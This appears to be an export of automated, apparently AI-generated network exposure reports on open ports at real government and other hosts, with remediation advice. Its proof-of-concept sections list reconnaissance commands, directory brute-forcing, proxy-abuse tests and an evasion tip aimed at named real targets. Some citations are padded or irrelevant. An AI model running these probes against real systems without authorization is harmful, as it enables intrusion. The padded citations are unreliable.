As the standard port for HTTPS traffic, this represents the secure web interface for the site. Although expected for most public-facing websites, the mere fact of being open still constitutes part of the overall network footprint and must be evaluated alongside other findings for holistic risk posture analysis.\n\nAttackers routinely target HTTPS services for certificate inspection, cipher suite weaknesses, TLS downgrade attempts, and exploitation of outdated SSL/TLS implementations.\n\n**Attack Scenario (Proof of Concept)**  \nUsing OpenSSL to inspect the TLS handshake:\n\n```bash\nopenssl s_client -connect ep.gov.pk:443 -servername ep.gov.pk\n```\n\nReview supported ciphersuites, certificate validity period, issuer chain, and presence of deprecated protocols like SSLv3 or TLS 1.0. Tools like testssl.sh automate comprehensive checks:\n\n```bash\ntestssl.sh https://ep.gov.pk\n```\n\nAdditionally, directory brute-forcing or virtual host enumeration may reveal hidden content or subdomains hosted behind the same IP.\n\n**Business Impact**  \nWhile essential for delivering encrypted communications, improperly configured TLS settings undermine trustworthiness and expose users to man-in-the-middle attacks, session hijacking, or credential theft. 
Non-compliance with industry standards (PCI DSS, HIPAA) may result in legal ramifications.\n\n**Remediation**  \n- Ensure TLS version 1.2 or higher is enforced.\n- Deploy HSTS headers and redirect all HTTP traffic to HTTPS.\n- Renew certificates before expiration and utilize certificate transparency logs.\n- Employ Perfect Forward Secrecy (PFS) and disable weak cryptographic algorithms.\n\nReference: CWE-327 – Use of a Broken or Risky Cryptographic Algorithm  \nOWASP Top Ten: A07:2021 – Identification and Authentication Failures","summary":{"total":4}},"summary":{"total":4}},{"_id":{"$oid":"6a0ff581eaf2c9077db90d2c"},"created_at":{"$date":"2026-05-22T06:19:45.984Z"},"url":"https://ep.gov.pk/","tool":"generate_network_exposure_report","result":{"url":"https://ep.gov.pk/","category":"network_exposure","timestamp":"2026-05-22T06:19:45.975063+00:00","report":"### Open Port 8020/tcp on 124.109.52.82\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 124.109.52.82 |\n\n**Description**  \nPort 8020/tcp is open on the IP address `124.109.52.82`. This port has been identified by the tool Naabu during a network scan. While not inherently insecure, exposed ports increase the attack surface of a system and should be evaluated for necessity and proper configuration. The service running on this port was later identified via Nmap as an HTTP proxy associated with FortiGuard Web Filtering.\n\n**Attack Scenario (Proof of Concept)**  \nAn attacker performs a port scan using tools like `nmap` or `masscan`, identifying that port 8020 is open. 
They then attempt to interact with the service:\n\n```bash\nnmap -sV -p 8020 124.109.52.82\n```\n\nIf misconfigured, such proxies may allow unauthorized access to internal resources or act as pivot points for further lateral movement within the network.\n\n**Business Impact**  \nUnnecessary exposure of services increases risk of exploitation, especially if default credentials or known vulnerabilities exist. It also provides attackers additional entry vectors into the organization’s infrastructure.\n\n**Remediation**  \nEnsure only required ports are publicly accessible. If this port serves no external purpose, restrict access at the firewall level. Review whether FortiGuard Web Filtering requires public accessibility; typically, these services should be internal or behind authentication.\n\n---\n\n### Open Port 8015/tcp on 124.109.52.82\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 124.109.52.82 |\n\n**Description**  \nPort 8015/tcp is open on the IP address `124.109.52.82`. Identified via Naabu, this port was later confirmed by Nmap to host an HTTP proxy service branded as FortiGuard Web Filtering. 
Exposed proxy servers can pose significant risks if improperly configured, including allowing bypassing of content filtering policies or acting as intermediaries for malicious traffic.\n\n**Attack Scenario (Proof of Concept)**  \nThe attacker uses `curl` or similar tools to test connectivity through the proxy:\n\n```bash\ncurl --proxy http://124.109.52.82:8015 http://example.com/\n```\n\nIf successful, they might use it to mask their origin or bypass local restrictions.\n\n**Business Impact**  \nPublicly exposed proxy endpoints can lead to abuse for anonymizing attacks, exfiltration of sensitive data, or circumvention of corporate web filters—potentially leading to compliance violations or compromise.\n\n**Remediation**  \nRestrict access to this port unless absolutely necessary for business operations. Ensure strong authentication mechanisms are enforced if public exposure is required. Apply vendor-specific hardening guidelines from Fortinet regarding FortiGuard deployments.\n\n---\n\n### Open Port 8008/tcp on 124.109.52.82\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 124.109.52.82 |\n\n**Description**  \nPort 8008/tcp is open on the IP address `124.109.52.82`. Scanned using Naabu, this port was later identified by Nmap as hosting an HTTP service. 
Alternate HTTP ports often indicate non-standard configurations which may lack standard protections such as WAFs or hardened server settings.\n\n**Attack Scenario (Proof of Concept)**  \nUsing `curl` or browser-based testing:\n\n```bash\ncurl http://124.109.52.82:8008/\n```\n\nThis reveals information about backend systems or applications potentially less protected than those on standard ports.\n\n**Business Impact**  \nExposing alternative HTTP ports without adequate protection increases the likelihood of successful reconnaissance and exploitation attempts against underprotected services.\n\n**Remediation**  \nAudit all non-standard HTTP(S) ports for necessity. Implement consistent security controls across all listening web interfaces. Where possible, redirect or disable alternate ports unless explicitly needed.\n\n---\n\n### Open Port 80/tcp Detected on 124.109.52.82\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | https://ep.gov.pk/ |\n\n**Description**  \nStandard HTTP port 80/tcp is open on the asset `124.109.52.82`, associated with the domain ep.gov.pk. Identified via Masscan, this represents typical web server behavior but still contributes to overall network footprint visibility.\n\n**Attack Scenario (Proof of Concept)**  \nA basic HTTP GET request confirms availability:\n\n```bash\ncurl http://124.109.52.82/\n```\n\nFurther enumeration could involve directory brute-forcing or fingerprinting techniques to identify underlying technologies.\n\n**Business Impact**  \nWhile expected for websites, unencrypted HTTP remains vulnerable to man-in-the-middle interception and should ideally redirect to HTTPS.\n\n**Remediation**  \nImplement automatic redirection from HTTP to HTTPS. Enforce HSTS headers where appropriate. 
Monitor logs for suspicious activity targeting plaintext communication channels.\n\n---\n\n### Open Port 443/tcp Detected on 124.109.52.82\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | https://ep.gov.pk/ |\n\n**Description**  \nSecure HTTPS port 443/tcp is open on `124.109.52.82`. Identified via Masscan, this is essential for encrypted communications. However, Nmap classified the service as “tcpwrapped,” indicating potential wrapping or filtering logic applied before reaching the actual TLS endpoint.\n\n**Attack Scenario (Proof of Concept)**  \nUse OpenSSL to inspect certificate details:\n\n```bash\nopenssl s_client -connect 124.109.52.82:443\n```\n\nCheck for weak cipher suites, expired certificates, or improper SSL/TLS configurations.\n\n**Business Impact**  \nImproper TLS setup can expose users to eavesdropping, downgrade attacks, or trust issues undermining secure transactions.\n\n**Remediation**  \nEnsure valid, up-to-date certificates are used. Disable outdated protocols (SSLv2/v3). Employ modern cipher suites aligned with industry best practices (e.g., TLS 1.2+).\n\n---\n\n### Open Port 80/tcp (http) — Microsoft-HTTPAPI/2.0\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | ep.gov.pk |\n\n**Description**  \nNmap identifies that port 80 hosts an HTTP service powered by Microsoft HTTP API version 2.0 (`Microsoft-HTTPAPI/2.0`). 
This usually indicates a lightweight embedded web server component rather than full IIS deployment, commonly seen in .NET self-hosted applications or administrative interfaces.\n\n**Attack Scenario (Proof of Concept)**  \nEnumerate directories or endpoints using Burp Suite or `gobuster`:\n\n```bash\ngobuster dir -u http://ep.gov.pk -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt\n```\n\nLook for hidden APIs or debug pages exposing sensitive functionality.\n\n**Business Impact**  \nMisconfigured embedded HTTP servers can leak internal paths, expose debugging features, or provide unintended access to application internals.\n\n**Remediation**  \nReview application codebase for unnecessary exposure of development endpoints. Restrict access based on role-based authorization. Regularly audit exposed routes for unintended disclosure.\n\n---\n\n### Open Port 443/tcp (tcpwrapped)\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | ep.gov.pk |\n\n**Description**  \nPort 443/tcp appears open but returns a “tcpwrapped” response when scanned with Nmap. This suggests that some form of middleware (such as xinetd or stunnel) intercepts connections prior to reaching the final destination service. Such wrappers obscure true service identity and complicate vulnerability assessments.\n\n**Attack Scenario (Proof of Concept)**  \nAttempt direct connection using OpenSSL:\n\n```bash\nopenssl s_client -connect ep.gov.pk:443\n```\n\nIf wrapped incorrectly, unexpected responses or timeouts may occur, revealing wrapper presence or misconfiguration.\n\n**Business Impact**  \nObscured service identification hinders both legitimate monitoring and incident response efforts while potentially masking insecure configurations beneath the wrapper layer.\n\n**Remediation**  \nVerify integrity and configuration of any TCP wrapping layers. 
Ensure encryption termination occurs securely and logging/tracing capabilities remain intact despite obfuscation.\n\n---\n\n### Open Port 8008/tcp (http)\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | ep.gov.pk |\n\n**Description**  \nAnother instance of an HTTP listener found on port 8008/tcp for the domain `ep.gov.pk`. As previously noted, alternate HTTP ports require careful scrutiny due to reduced likelihood of robust security implementation compared to primary web services.\n\n**Attack Scenario (Proof of Concept)**  \nInitiate probing with `nikto` or manual inspection:\n\n```bash\nnikto -h http://ep.gov.pk:8008\n```\n\nIdentify banners, error messages, or default landing pages indicative of development/test environments.\n\n**Business Impact**  \nAlternate HTTP listeners may serve outdated software versions or contain debugging artifacts, increasing susceptibility to exploitation.\n\n**Remediation**  \nConduct regular audits of all active ports. Remove or restrict access to non-production services. Apply uniform patch management and hardening procedures across all listening HTTP instances.\n\n---\n\n### Open Port 8015/tcp (http-proxy) — FortiGuard Web Filtering\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | ep.gov.pk |\n\n**Description**  \nPort 8015/tcp exposes an HTTP proxy service labeled as FortiGuard Web Filtering. 
These appliances are designed to filter internet-bound traffic but exposing them externally introduces risk of misuse or unauthorized access.\n\n**Attack Scenario (Proof of Concept)**  \nTest proxy functionality:\n\n```bash\ncurl --proxy http://ep.gov.pk:8015 http://ifconfig.me/ip\n```\n\nSuccessful execution would confirm ability to route arbitrary requests through the proxy.\n\n**Business Impact**  \nExposed filtering proxies can be abused for anonymization, evasion of policy enforcement, or relaying malicious traffic originating from trusted domains.\n\n**Remediation**  \nLimit access to this port strictly to authorized internal networks. Audit proxy rules regularly. Enable authentication and logging for all proxy activities.\n\n---\n\n### Open Port 8020/tcp (http-proxy) — FortiGuard Web Filtering\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | ep.gov.pk |\n\n**Description**  \nSimilar to port 8015, port 8020/tcp runs another instance of FortiGuard Web Filtering configured as an HTTP proxy. Multiple proxy instances suggest complex routing or redundancy strategies, each expanding the organization's attack surface.\n\n**Attack Scenario (Proof of Concept)**  \nRepeat earlier proxy tests:\n\n```bash\ncurl --proxy http://ep.gov.pk:8020 http://ifconfig.me/ip\n```\n\nDetermine if different filtering rules or access levels apply between proxy instances.\n\n**Business Impact**  \nMultiple exposed proxy endpoints multiply opportunities for abuse, particularly if inconsistent policies govern each one.\n\n**Remediation**  \nConsolidate proxy usage wherever feasible. Standardize access control and filtering rules. 
Continuously monitor proxy logs for anomalies or signs of abuse.","summary":{"total":10}},"summary":{"total":10}},{"_id":{"$oid":"6a11b8315fc497eb9914e08b"},"created_at":{"$date":"2026-05-23T14:22:41.819Z"},"url":"https://uppolice.gov.in/","tool":"generate_network_exposure_report","result":{"url":"https://uppolice.gov.in/","category":"network_exposure","timestamp":"2026-05-23T14:22:41.812953+00:00","report":"### [No Open Ports Found / uppolice.gov.in / N/A]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | network_exposure |\n| Asset / URL | uppolice.gov.in |\n\n**Description**\n\nThis finding indicates that during scanning, no open TCP or UDP ports were identified on the host `uppolice.gov.in`. This may suggest either:\n- The system is not actively listening for incoming connections.\n- A firewall or filtering mechanism is blocking all scanned ports.\n- The system was offline or unreachable at the time of scan.\n\nThe tool used to detect this condition was `naabu`, which performs fast port scans using SYN scanning techniques by default.\n\nIt should be noted that while no open ports were detected, this does not necessarily indicate a secure configuration; it simply means no services were exposed during the scan window.\n\n**Attack Scenario (Proof of Concept)**\n\nAn attacker attempting to fingerprint available services might use tools such as `nmap` or `masscan` to enumerate open ports:\n\n```bash\nnmap -p- uppolice.gov.in\n```\n\nIf no ports respond, the attacker may attempt to:\n- Scan from different geographic locations or IP ranges.\n- Use fragmented packets or timing evasion techniques (`--defeat-rst-ratelimit`) to bypass simple firewalls.\n- Perform service-specific scans targeting common web/application ports like 80, 443, 8080, etc.\n\nIn some cases, stealthier reconnaissance methods (e.g., ICMP-based discovery or passive DNS enumeration) can still yield useful intelligence even when active port scanning 
fails.\n\n**Business Impact**\n\nWhile having no open ports reduces direct exposure to remote exploitation, it also implies limited accessibility for legitimate users or systems. If intended services are unreachable due to misconfigured firewalls or network policies, business operations relying on those endpoints will suffer downtime or degraded performance.\n\nAdditionally, overly restrictive configurations without proper monitoring can mask underlying issues such as accidental service shutdowns or infrastructure outages.\n\n**Remediation**\n\nEnsure that necessary services are accessible only to authorized entities via appropriate access control lists (ACLs), firewalls, and segmentation strategies.\n\nWhere applicable:\n- Review firewall rules to ensure they align with operational requirements.\n- Implement logging and alerting mechanisms to detect unintended service unavailability.\n- Conduct periodic connectivity tests to validate availability of critical services.\n\n---\n\n### [Open Port 443/tcp Detected / 208.91.112.55 / tcp/443]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | network_exposure |\n| Asset / URL | 208.91.112.55 |\n\n**Description**\n\nPort 443/tcp is commonly associated with HTTPS traffic, indicating that an SSL/TLS-enabled HTTP server is running on this address. During the masscan operation, this port was observed to be open and responsive.\n\nThis suggests that there is likely a web application or reverse proxy serving content over encrypted channels on this endpoint. 
However, further analysis would be required to determine the nature of the hosted service, its version, and potential vulnerabilities.\n\n**Attack Scenario (Proof of Concept)**\n\nAn attacker could begin interacting with the service using standard tools:\n\n```bash\ncurl -v https://208.91.112.55\n```\n\nThey may then proceed with:\n- Certificate inspection to gather domain names and issuer information.\n- Directory brute-forcing using tools like `gobuster`.\n- Vulnerability scanning with tools such as `nikto` or `testssl.sh`.\n\nExample directory enumeration command:\n```bash\ngobuster dir -u https://208.91.112.55 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt\n```\n\nIf weak TLS configurations exist, attackers may exploit known cipher suites or protocol downgrade attacks.\n\n**Business Impact**\n\nExposing HTTPS services increases the attack surface but is often necessary for public-facing applications. Misconfigurations in SSL/TLS settings or outdated software versions can lead to man-in-the-middle attacks, credential theft, or compliance violations under standards such as PCI-DSS or HIPAA.\n\n**Remediation**\n\nEnsure that:\n- Only strong encryption protocols (TLS 1.2+) are enabled.\n- Weak ciphers and deprecated algorithms are disabled.\n- Certificates are valid, properly configured, and renewed automatically.\n- Access logs are monitored for suspicious activity.\n\nUse tools like Mozilla's SSL Configuration Generator to harden TLS stacks.\n\nReference: [OWASP Transport Layer Protection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html)\n\n---\n\n### [Open Port 80/tcp Detected / 208.91.112.55 / tcp/80]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | network_exposure |\n| Asset / URL | 208.91.112.55 |\n\n**Description**\n\nPort 80/tcp corresponds to plain-text HTTP communication. 
Its presence indicates that a web server is accepting unencrypted requests on this interface. While convenient for legacy compatibility or internal use, exposing HTTP services publicly poses significant risks unless explicitly protected by intermediaries such as load balancers or WAFs.\n\nThis finding was detected using `masscan`.\n\n**Attack Scenario (Proof of Concept)**\n\nAn attacker can interact directly with the HTTP service:\n\n```bash\ncurl http://208.91.112.55/\n```\n\nThey may perform actions including:\n- Enumerating directories and files.\n- Attempting login brute-force against exposed interfaces.\n- Exploiting insecure headers or missing security controls.\n\nSample header inspection:\n```bash\ncurl -I http://208.91.112.55/\n```\n\nWithout HTTPS enforcement, sensitive data transmitted over this channel (such as credentials or session tokens) can be intercepted by adversaries on shared networks.\n\n**Business Impact**\n\nUnsecured HTTP services expose organizations to eavesdropping, session hijacking, and injection attacks. 
Additionally, many modern browsers flag non-HTTPS sites as “not secure,” potentially damaging user trust and brand reputation.\n\nRegulatory frameworks such as GDPR emphasize protecting personal data in transit, making plaintext HTTP a liability.\n\n**Remediation**\n\nImplement the following measures:\n- Redirect all HTTP traffic to HTTPS using permanent redirects (HTTP 301).\n- Enforce HSTS (HTTP Strict Transport Security) headers.\n- Disable unnecessary cleartext HTTP listeners where possible.\n\nApache example redirect rule:\n```apache\n<VirtualHost *:80>\n    ServerName example.com\n    Redirect permanent / https://example.com/\n</VirtualHost>\n```\n\nCWE-319: Cleartext Transmission of Sensitive Information  \n[OWASP A02:2021 – Cryptographic Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures/)\n\n---\n\n### [Open Port 443/tcp (HTTPS) / uppolice.gov.in / tcp/443]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | network_exposure |\n| Asset / URL | uppolice.gov.in |\n\n**Description**\n\nPort 443/tcp is confirmed as open and hosts an HTTPS service on the domain `uppolice.gov.in`. This represents the primary entry point for secure communications with the website. 
It supports encrypted browsing sessions essential for transmitting confidential data between clients and servers.\n\nIdentified via `nmap_scan`, this port typically serves web pages, APIs, or administrative panels depending on backend architecture.\n\n**Attack Scenario (Proof of Concept)**\n\nAn attacker initiates interaction with the HTTPS service:\n\n```bash\ncurl -v https://uppolice.gov.in\n```\n\nThey may then:\n- Analyze response headers for security indicators (X-Frame-Options, CSP, etc.)\n- Test for certificate validity and expiration dates.\n- Probe for known vulnerabilities in the web stack (e.g., Apache/Nginx versions).\n\nUsing `testssl.sh`:\n```bash\ntestssl.sh https://uppolice.gov.in\n```\n\nMisconfigured SSL parameters or outdated components increase susceptibility to exploits such as BEAST, POODLE, or Heartbleed.\n\n**Business Impact**\n\nAs the main public-facing interface, any compromise here could result in full site defacement, unauthorized access to databases, or impersonation of law enforcement personnel—particularly concerning given the `.gov.in` TLD.\n\nCompliance failures related to encryption standards may incur legal penalties or audit findings.\n\n**Remediation**\n\nApply best practices for securing HTTPS deployments:\n- Enable Perfect Forward Secrecy (PFS).\n- Remove support for obsolete protocols (SSLv2/SSLv3).\n- Regularly update certificates and underlying software stacks.\n\nNginx sample TLS configuration:\n```nginx\nssl_protocols TLSv1.2 TLSv1.3;\nssl_ciphers HIGH:!aNULL:!MD5;\nssl_prefer_server_ciphers on;\n```\n\nCWE-297: Improper Validation of Certificate with Host Mismatch  \n[OWASP A07:2021 – Identification and Authentication Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures/)\n\n---\n\n### [Open Port 8008/tcp (HTTP) / uppolice.gov.in / tcp/8008]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | network_exposure |\n| Asset / URL | uppolice.gov.in 
|\n\n**Description**\n\nPort 8008/tcp is identified as hosting an HTTP service. Unlike standard ports 80 or 443, this alternative port may serve development environments, internal dashboards, or auxiliary services not meant for general public consumption.\n\nIts exposure raises concerns about unintended accessibility and lack of authentication or authorization controls.\n\n**Attack Scenario (Proof of Concept)**\n\nAn attacker probes the alternate port:\n\n```bash\ncurl http://uppolice.gov.in:8008/\n```\n\nThey may discover:\n- Debugging interfaces or API endpoints.\n- Administrative panels lacking login protection.\n- Internal metrics or status pages revealing infrastructure details.\n\nTools like Burp Suite or ZAP can automate probing of such endpoints for hidden functionality.\n\n**Business Impact**\n\nUnauthorized access to internal services exposes sensitive operational data, facilitates lateral movement within the network, and undermines perimeter defenses. Even seemingly benign debug pages can leak stack traces, environment variables, or database connection strings.\n\n**Remediation**\n\nRestrict access to non-standard ports using:\n- Firewall ACLs limiting source IPs.\n- Reverse proxies enforcing authentication before reaching backend services.\n- Removal of unnecessary listeners entirely.\n\nExample iptables rule:\n```bash\niptables -A INPUT -p tcp --dport 8008 -j DROP\n```\n\nAlternatively, bind services to localhost only:\n```ini\nbind_address = 127.0.0.1\n```\n\nCWE-1190: Daemon Uses Unprotected Communication Channel  \n[OWASP A01:2021 – Broken Access Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control/)\n\n---\n\n### [Open Port 8015/tcp (HTTP Proxy – FortiGuard Web Filtering) / uppolice.gov.in / tcp/8015]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | network_exposure |\n| Asset / URL | uppolice.gov.in |\n\n**Description**\n\nPort 8015/tcp is identified as running an HTTP proxy service branded as 
Fortinet’s FortiGuard Web Filtering solution. These appliances act as intermediaries for outbound web traffic, applying filtering rules based on threat intelligence feeds.\n\nHowever, exposing such a device externally introduces risk if improperly configured, especially if it allows unrestricted proxy usage or lacks authentication.\n\n**Attack Scenario (Proof of Concept)**\n\nAn attacker attempts to route traffic through the proxy:\n\n```bash\ncurl --proxy http://uppolice.gov.in:8015 http://target-site.com\n```\n\nIf successful, they gain anonymized internet access routed through your organization’s infrastructure, potentially masking malicious behavior or violating acceptable use policies.\n\nAdditionally, misconfigured proxies may allow tunneling protocols or bypass filtering logic altogether.\n\n**Business Impact**\n\nImproperly secured proxies enable abuse scenarios including:\n- Circumvention of corporate web filters.\n- Concealment of malicious activities behind trusted IP addresses.\n- Bandwidth misuse leading to increased costs or degraded performance.\n\nLegal ramifications arise if third-party actors conduct illegal activities using compromised proxy infrastructure.\n\n**Remediation**\n\nSecure proxy deployments require:\n- Strong authentication mechanisms (LDAP/RADIUS integration).\n- Explicit deny-all policies except for designated roles.\n- Logging and monitoring of proxy transactions.\n\nFortiOS CLI example:\n```fortios\nconfig firewall proxy-policy\n    edit 1\n        set srcintf \"internal\"\n        set dstintf \"external\"\n        set srcaddr \"all\"\n        set dstaddr \"all\"\n        set schedule \"always\"\n        set service \"webfilter\"\n        set action deny\n    next\nend\n```\n\nCWE-441: Unintended Proxy or Intermediary ('Confused Deputy')  \n[OWASP A05:2021 – Security Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration/)\n\n---\n\n### [Open Port 8020/tcp (HTTP Proxy – FortiGuard
Web Filtering) / uppolice.gov.in / tcp/8020]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | network_exposure |\n| Asset / URL | uppolice.gov.in |\n\n**Description**\n\nSimilar to port 8015, port 8020/tcp runs another instance of Fortinet’s FortiGuard Web Filtering proxy. Multiple proxy instances may indicate redundancy, load balancing, or segmented policy enforcement across departments or zones.\n\nHowever, each additional listener expands the attack surface and requires independent validation for correct deployment and access restrictions.\n\n**Attack Scenario (Proof of Concept)**\n\nAn attacker repeats earlier proxy testing procedures:\n\n```bash\ncurl --proxy http://uppolice.gov.in:8020 http://target-site.com\n```\n\nThey may find differences in filtering behavior, authentication requirements, or routing capabilities compared to other proxy ports.\n\nAutomated scanners like `proxychains` combined with custom scripts can systematically test multiple proxy endpoints simultaneously.\n\n**Business Impact**\n\nEach exposed proxy increases complexity and likelihood of misconfiguration. 
Inconsistent policies across proxies may create gaps exploitable by adversaries seeking unfettered internet access or evasion opportunities.\n\nOrganizations face reputational harm and regulatory scrutiny if their infrastructure becomes complicit in cybercrime.\n\n**Remediation**\n\nConsolidate proxy configurations and enforce centralized management:\n- Standardize filtering profiles and access policies.\n- Audit and remove redundant or unused proxy listeners.\n- Monitor logs for anomalous proxy usage patterns.\n\nFortiOS GUI recommendation:\nNavigate to **Security Profiles > Web Filter**, review assigned policies per interface, and disable unused ones.\n\nCWE-1007: Insufficient Visual Distinction of Homograph Characters (Not directly relevant but highlights importance of clear labeling and distinction among similar assets.)\n\n[OWASP A05:2021 – Security Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration/)","summary":{"total":7}},"summary":{"total":7}},{"_id":{"$oid":"6a13749f11563b5a758d079e"},"created_at":{"$date":"2026-05-24T21:58:55.255Z"},"url":"https://cp-club-vjti.vercel.app/","tool":"generate_network_exposure_report","result":{"url":"https://cp-club-vjti.vercel.app/","category":"network_exposure","timestamp":"2026-05-24T21:58:55.250782+00:00","report":"An error occurred (UnrecognizedClientException) when calling the Converse operation: The security token included in the request is invalid.","summary":{"total":13}},"summary":{"total":13}},{"_id":{"$oid":"6a13e2cdd7f9ee4baa997ca0"},"created_at":{"$date":"2026-05-25T05:49:01.194Z"},"url":"https://cp-club-vjti.vercel.app/","tool":"generate_network_exposure_report","result":{"url":"https://cp-club-vjti.vercel.app/","category":"network_exposure","timestamp":"2026-05-25T05:49:01.186976+00:00","report":"An error occurred (UnrecognizedClientException) when calling the Converse operation: The security token included in the request is 
invalid.","summary":{"total":13}},"summary":{"total":13}},{"_id":{"$oid":"6a13e65c884a4427a78749ce"},"created_at":{"$date":"2026-05-25T06:04:12.159Z"},"url":"https://cp-club-vjti.vercel.app/","tool":"generate_network_exposure_report","result":{"url":"https://cp-club-vjti.vercel.app/","category":"network_exposure","timestamp":"2026-05-25T06:04:12.149082+00:00","report":"An error occurred (UnrecognizedClientException) when calling the Converse operation: The security token included in the request is invalid.","summary":{"total":13}},"summary":{"total":13}},{"_id":{"$oid":"6a141bfbd5f7dfbdb953ff76"},"created_at":{"$date":"2026-05-25T09:52:59.623Z"},"url":"https://cp-club-vjti.vercel.app/","tool":"generate_network_exposure_report","result":{"url":"https://cp-club-vjti.vercel.app/","category":"network_exposure","timestamp":"2026-05-25T09:52:59.616286+00:00","report":"An error occurred (UnrecognizedClientException) when calling the Converse operation: The security token included in the request is invalid.","summary":{"total":13}},"summary":{"total":13}},{"_id":{"$oid":"6a141d52fe8e0c2132d82e5b"},"created_at":{"$date":"2026-05-25T09:58:42.871Z"},"url":"https://cp-club-vjti.vercel.app/","tool":"generate_network_exposure_report","result":{"url":"https://cp-club-vjti.vercel.app/","category":"network_exposure","timestamp":"2026-05-25T09:58:42.864315+00:00","report":"### Open Port 8020/tcp on 64.29.17.67\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 64.29.17.67 |\n\n**Description**  \nPort 8020/tcp is open on the host 64.29.17.67. This port is commonly associated with HTTP proxy services or custom web applications. Its exposure indicates that a service is actively listening on this port and may respond to incoming TCP connections. 
While not inherently insecure, open non-standard ports increase the attack surface by providing additional entry points for reconnaissance or exploitation if the underlying service is misconfigured or vulnerable.\n\n**Attack Scenario (Proof of Concept)**  \nAn attacker performs a port scan using tools like `nmap` or `masscan`, identifying that port 8020 is open. They then attempt to connect via HTTP:\n\n```bash\ncurl -v http://64.29.17.67:8020/\n```\n\nIf the response reveals headers indicating a known software version or configuration details, the attacker can proceed with targeted exploits. If it's a proxy, they might try to abuse it for anonymization or internal scanning.\n\n**Business Impact**  \nExposing unnecessary ports increases the organization’s attack surface without clear business justification. It may lead to unauthorized access if the service behind the port has vulnerabilities or weak authentication mechanisms. Additionally, automated scanners and threat actors often target such ports during initial reconnaissance phases.\n\n---\n\n### Open Port 8015/tcp on 64.29.17.67\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 64.29.17.67 |\n\n**Description**  \nPort 8015/tcp is open on the IP address 64.29.17.67. This port typically hosts HTTP-based services or proxies. The presence of an open port suggests that a service is running and accessible over the network. 
Without further context about the nature of the service, this represents a potential vector for information disclosure or exploitation depending on the implementation.\n\n**Attack Scenario (Proof of Concept)**  \nThe attacker initiates a connection to the exposed port:\n\n```bash\nnc -zv 64.29.17.67 8015\n```\n\nThey follow up with an HTTP GET request to probe for banners or error pages:\n\n```http\nGET / HTTP/1.1\nHost: 64.29.17.67:8015\n```\n\nResponses revealing server type, version, or directory listings provide clues for crafting more advanced attacks.\n\n**Business Impact**  \nUnnecessary exposure of ports increases risk of compromise due to unmonitored or outdated services. Even if benign, these endpoints consume resources and complicate network monitoring efforts.\n\n---\n\n### Open Port 443/tcp on 64.29.17.67\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 64.29.17.67 |\n\n**Description**  \nPort 443/tcp is open on 64.29.17.67, which is standard for HTTPS traffic. This implies that a secure web server is operational at this endpoint. However, the mere availability of the port does not indicate whether TLS configurations are secure or if there are vulnerabilities within the hosted application layer.\n\n**Attack Scenario 